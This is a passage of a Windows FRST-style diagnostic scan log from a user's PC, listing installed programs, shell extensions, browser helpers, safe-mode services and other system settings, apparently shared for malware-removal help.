(HKLM-x32\...\{952DD7C5-99FB-40A3-9CBF-2F0A46985D2B}) (Version: 1.0 - LeeGTs Games) CLUE Classic (HKLM-x32\...\CLUE Classic_is1) (Version: - ) Discord (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Discord) (Version: 0.0.309 - Discord Inc.) Dolby Audio X2 Windows API SDK (HKLM\...\{82C288CC-A96D-43E3-9119-944DABF5DD61}) (Version: 0.8.0.74 - Dolby Laboratories, Inc.) Dolby Audio X2 Windows APP (HKLM\...\{9207D68E-666A-49C7-A900-9F5B2FF289E4}) (Version: 0.8.0.71 - Dolby Laboratories, Inc.) Excel (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\1fc5b090eab9aa41f8a2f5987367e6da) (Version: 1.0 - Excel) Excel (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\1fc5b090eab9aa41f8a2f5987367e6da) (Version: 1.0 - Excel) Graphics Rules Maker (HKLM-x32\...\Graphics Rules Maker) (Version: 1.1.0 - SimsNetwork.com) HitmanPro 3.8 (HKLM\...\HitmanPro38) (Version: 3.8.10.298 - SurfRight B.V.) Intel® C++ Redistributables on Intel® 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation) Lenovo Service Bridge (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{2C74547D-EF88-47F4-85F5-BE46A31E26B7}_is1) (Version: 5.0.2.2 - Lenovo) Lenovo System Update (HKLM-x32\...\TVSU_is1) (Version: 5.07.0118 - Lenovo) Malwarebytes version 4.3.3.116 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.3.3.116 - Malwarebytes) MATLAB R2019b (HKLM\...\Matlab R2019b) (Version: 9.7 - MathWorks) Maxon Cinema 4D 23 (HKLM\...\Maxon Cinema 4D R23) (Version: R23 - Maxon) McAfee® Total Protection (HKLM-x32\...\MSC) (Version: 16.0 R31 - McAfee, LLC) Microsoft 365 Apps for enterprise - en-us (HKLM\...\O365ProPlusRetail - en-us) (Version: 16.0.13929.20296 - Microsoft Corporation) Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 90.0.818.51 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\OneDriveSetup.exe) (Version: 21.073.0411.0002 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\OneDriveSetup.exe) (Version: 19.043.0304.0013 - Microsoft Corporation) Microsoft Teams (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Teams) (Version: 1.3.00.28779 - Microsoft Corporation) Microsoft Teams (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Teams) (Version: 1.3.00.26064 - Microsoft Corporation) Microsoft Update Health Tools (HKLM\...\{A0E1B43D-5F4A-46AF-9925-ABA3423325DC}) (Version: 2.77.0.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29913 (HKLM-x32\...\{855e31d2-9031-46e1-b06d-c9d7777deefb}) (Version: 14.28.29913.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29913 (HKLM-x32\...\{03d1453c-7d5c-479c-afea-8482f406e036}) (Version: 14.28.29913.0 - Microsoft Corporation) Microsoft Visual Studio Code (User) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.56.0 - Microsoft Corporation) Node.js (HKLM\...\{C6D70F34-C254-4D55-B4A0-55F921939297}) (Version: 15.14.0 - Node.js Foundation) NVIDIA FrameView SDK 1.1.4923.29781331 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.1.4923.29781331 - NVIDIA Corporation) NVIDIA GeForce Experience 3.22.0.32 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.22.0.32 - NVIDIA Corporation) Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.13929.20296 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.13929.20296 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0409-1000-0000000FF1CE}) (Version: 16.0.13929.20216 - Microsoft Corporation) Hidden Outlook (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\6b0f23e57a39ebfbf2814acb1a24293d) (Version: 1.0 - Outlook) Outlook (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\6b0f23e57a39ebfbf2814acb1a24293d) (Version: 1.0 - Outlook) PowerPoint (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\319814cb56b667dff88f54e08be8f51f) (Version: 1.0 - PowerPoint) Python 3.9.4 (64-bit) (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\{e300c142-10a9-46f4-a195-bd40cb90a84f}) (Version: 3.9.4150.0 - Python Software Foundation) Python 3.9.4 Add to Path (64-bit) (HKLM\...\{D5076D33-101B-4402-AAC0-001C6D74D9AB}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Core Interpreter (64-bit) (HKLM\...\{DE09AD3C-F617-4EAF-B4F5-943473CB00DA}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Development Libraries (64-bit) (HKLM\...\{CCD8CD39-7BDE-46B9-9222-336226D0C346}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Documentation (64-bit) (HKLM\...\{C625291F-C4B5-45A7-B946-FFAB8535A64A}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Executables (64-bit) (HKLM\...\{A8C63C1D-BCF8-4446-AFAA-AE21DDA1DBEF}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 pip Bootstrap (64-bit) (HKLM\...\{2E65BC05-C532-4BD6-ACDD-3CFDE86F5E36}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Standard Library (64-bit) (HKLM\...\{D8D430E7-0DCE-418C-A937-735F329C1AD8}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Tcl/Tk Support (64-bit) (HKLM\...\{E4228F0E-C40C-403A-9533-29BA5A9F9E99}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Test Suite (64-bit) (HKLM\...\{86FD19A0-F018-465C-B8C9-02EA01D35A4B}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python 3.9.4 Utility Scripts (64-bit) (HKLM\...\{0C0FBC09-C0AA-4B66-92BF-E321BC8C9FA5}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden Python Launcher (HKLM-x32\...\{12B4CAFF-F2FA-422B-B30C-2265217D8CF8}) (Version: 3.9.7398.0 - Python Software Foundation) s3pe - Sims3 Package Editor (HKLM-x32\...\s3pe) (Version: 14-0222-1852 - Peter L Jones) SlimDX Runtime .NET 4.0 x86 (January 2012) (HKLM-x32\...\{7EBD0E43-6AC0-4CA8-9990-00E50069AD29}) (Version: 2.0.13.43 - SlimDX Group) Spotify (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Spotify) (Version: 1.1.54.592.gc0b20638 - Spotify AB) Teams Machine-Wide Installer (HKLM-x32\...\{731F6BAA-A986-45A4-8936-7C3AAAAA760B}) (Version: 1.4.0.4167 - Microsoft Corporation) The Sims 2: Ultimate Collection (HKLM-x32\...\{04450C18-F039-4B81-A621-70C3B0F523D5}) (Version: 1.0.0.1 - Electronic Arts) The Sims™ 3 [anadius Repack] (HKLM-x32\...\The Sims™ 3_is1) (Version: 1.67.2.024037 - ) TSR Workshop (HKLM-x32\...\{F68B3749-D483-47E6-9BB8-097906F9D471}) (Version: 2.2.92 - The Sims Resource) USB Disk Security (HKLM-x32\...\USB Disk Security_is1) (Version: - Zbshareware Lab) Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1-2) (Version: 1.0.65.1 - LunarG, Inc.) Hidden WebAdvisor by McAfee (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.1.1.586 - McAfee, LLC) WinRAR 6.01 (64-bit) (HKLM\...\WinRAR archiver) (Version: 6.01.0 - win.rar GmbH) Word (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\1b837d0bf93d01407352736c91b7bf50) (Version: 1.0 - Word) Word (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\1b837d0bf93d01407352736c91b7bf50) (Version: 1.0 - Word) Zoom (HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\ZoomUMX) (Version: 5.4.9 (59931.0110) - Zoom Video Communications, Inc.) Zoom (HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\ZoomUMX) (Version: 5.0 - Zoom Video Communications, Inc.) Packages: ========= Adobe XD -> C:\Program Files\WindowsApps\Adobe.CC.XD_36.2.32.5_x64__adky2gkssdxte [2021-04-10] (Adobe Systems Incorporated) Adobe-Fresco -> C:\Program Files\WindowsApps\Adobe.Fresco_2.2.0.393_x64__pc75e8sa7ep4e [2021-04-10] (Adobe Inc.) Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.9.4213.0_x64__8wekyb3d8bbwe [2021-04-28] (Microsoft Studios) [MS Ad] NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.960.0_x64__56jybvy8sckqj [2021-01-20] (NVIDIA Corp.) Photos Add-on -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos.DLC.Main_2021.39122.10110.0_x64__8wekyb3d8bbwe [2021-03-12] (Microsoft Corporation) Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2020-11-07] (Microsoft Corporation) PowerPoint -> C:\Program Files\WindowsApps\powerpoint.office.com-8D456796_1.0.0.2_neutral__sxc7ffma4ybfy [2021-05-06] (powerpoint.office.com) ==================== Custom CLSID (Whitelisted): ============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) CustomCLSID: HKU\S-1-5-21-3936790745-3440936247-791344644-1001_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\FRANCIS\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20244.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-3936790745-3440936247-791344644-1001_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\FRANCIS\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20244.4\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2021-02-02] (Adobe Inc. -> Adobe Systems Inc.) ContextMenuHandlers1: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => C:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-05-06] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxDTCM.dll [2018-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2017-06-19] (NVIDIA Corporation -> NVIDIA Corporation) ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2021-01-28] (Adobe Inc. -> ) ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2021-02-02] (Adobe Inc. -> Adobe Systems Inc.) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2021-05-06] (Malwarebytes Corporation -> Malwarebytes) ContextMenuHandlers6: [McCtxMenuFrmWrk] -> {CCA9EFD3-29ED-430A-BA6D-E6BBFF0A60C2} => C:\Program Files\McAfee\MSC\McCtxMenuFrmWrk.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2021-04-07] (win.rar GmbH -> Alexander Roshal) ==================== Codecs (Whitelisted) ==================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Drivers32: [vidc.VP60] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2019-03-23] (Electronic Arts -> On2.com) HKLM\...\Drivers32: [vidc.VP61] => C:\WINDOWS\SysWOW64\vp6vfw.dll [447752 2019-03-23] (Electronic Arts -> On2.com) ==================== Shortcuts & WMI ======================== (The entries could be listed to be restored or removed.) ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Excel.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) -> --profile-directory=Default --app-id=leffmjdabcgaflkikcefahmlgpodjkdm --app-url=hxxps://excel.office.com/ ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Outlook.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) -> --profile-directory=Default --app-id=bjhmmnoficofgoiacjaajpkfndojknpb --app-url=hxxps://outlook.com/ ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Word.lnk -> C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe (Microsoft Corporation) -> --profile-directory=Default --app-id=hikhggiobiflkdfdgdajcfklmcibbopi --app-url=hxxps://word.office.com/ ShortcutWithArgument: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anaconda3 (64-bit)\Anaconda Prompt (anaconda3).lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> "/K" C:\Users\FRANCIS\anaconda3\Scripts\activate.bat C:\Users\FRANCIS\anaconda3 ==================== Loaded Modules (Whitelisted) ============= 2021-03-08 12:25 - 2021-03-08 12:25 - 000365056 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxHef9fb4ae#\92d73c1b4f373c56f37354527cf8180a\Interop.CxHDAudioAPILib.ni.dll 2021-03-08 12:25 - 2021-03-08 12:25 - 000018944 _____ () [File not signed] C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Interop.CxUtilSvcLib\b532a24672ce5738c417f60f93ec4be1\Interop.CxUtilSvcLib.ni.dll 2020-10-01 12:14 - 2010-12-08 15:21 - 000753664 _____ (BCGSoft Co Ltd) [File not signed] C:\Program Files (x86)\USB Disk Security\BCGPStyle2010Blue150.dll 2020-10-01 12:14 - 2015-01-31 10:08 - 006062080 _____ (BCGSoft Ltd) [File not signed] C:\Program Files (x86)\USB Disk Security\BCGCBPRO1500u80.dll 2020-09-28 20:17 - 2016-07-14 09:58 - 001155072 _____ (Conexant Systems, Inc.) [File not signed] [File is in use] C:\Program Files\Conexant\SAII\CxHDAudioAPI.dll 2020-10-01 12:14 - 2015-01-31 10:08 - 001093120 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\USB Disk Security\MFC80U.DLL 2020-10-01 16:40 - 2020-10-01 16:40 - 000057344 _____ (Microsoft Corporation) [File not signed] C:\WINDOWS\WinSxS\x86_microsoft.vc80.mfcloc_1fc8b3b9a1e18e3b_8.0.50727.762_none_43efccf17831d131\MFC80ENU.DLL 2020-12-22 09:08 - 2020-05-30 14:58 - 001280000 _____ (Robert Simpson, et al.) [File not signed] C:\ProgramData\Lenovo\iMController\Plugins\GenericMessagingPlugin\x86\x86\SQLite.Interop.dll ==================== Alternate Data Streams (Whitelisted) ======== (If an entry is included in the fixlist, only the ADS will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:7C9E34A2 [260] ==================== Safe Mode (Whitelisted) ================== (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ModuleCoreService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ModuleCoreService => ""="Service" ==================== Association (Whitelisted) ================= ==================== Internet Explorer (Whitelisted) ========== HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.lenovo.com SearchScopes: HKU\S-1-5-21-3936790745-3440936247-791344644-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3936790745-3440936247-791344644-1002 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\Office16\OCHelper.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) BHO: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll [2021-04-30] (McAfee, LLC -> McAfee, LLC) BHO: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) BHO-x32: Adobe Acrobat Create PDF Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) BHO-x32: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll [2021-04-30] (McAfee, LLC -> McAfee, LLC) BHO-x32: Adobe Acrobat Create PDF from Selection -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) Toolbar: HKLM - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\x64\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) Toolbar: HKLM-x32 - Adobe Acrobat Create PDF Toolbar - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\WCIEActiveX\DC\AcroIEFavStub.dll [2021-02-02] (Adobe Systems, Incorporated -> Adobe Systems Incorporated) DPF: HKLM-x32 {149E45D8-163E-4189-86FC-45022AB2B6C9} file:///C:/Program%20Files%20(x86)/CLUE%20Classic/Images/stg_drm.ocx DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455} DPF: HKLM-x32 {CC450D71-CC90-424C-8638-1F2DBAC87A54} file:///C:/Program%20Files%20(x86)/CLUE%20Classic/Images/armhelper.ocx Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC) Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2021-03-31] (McAfee, LLC -> McAfee, LLC) (If an entry is included in the fixlist, it will be removed from the registry.) IE trusted site: HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\sharepoint.com -> hxxps://mymailmapuaedu-files.sharepoint.com ==================== Other Areas =========================== (Currently there is no automatic fix for this section.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Python39\Scripts\;C:\Python39\;C:\Program Files (x86)\Common Files\Intel\Shared 